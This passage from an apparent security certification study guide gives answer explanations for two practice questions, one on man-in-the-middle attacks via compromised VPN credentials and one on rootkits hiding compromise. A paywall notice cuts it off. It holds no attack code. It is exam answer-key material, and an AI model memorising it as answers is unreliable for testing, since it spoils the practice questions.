9.  D. In a man-in-the-middle attack, traffic is commonly relayed through a malicious host to the legitimate endpoints. It is easiest to conduct this type of attack from the local network, so it makes the most sense to conclude that the attacker leveraged compromised VPN credentials and is now intercepting all of the workstation’s user traffic to and from the website.

10.  C. Rootkits will prevent system tools from accurately reporting the state of a computer. If these tools had reported evidence of compromise, you could conclude that an attack took place. However, finding no evidence is no reason to conclude that there is no compromise.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.225.55.151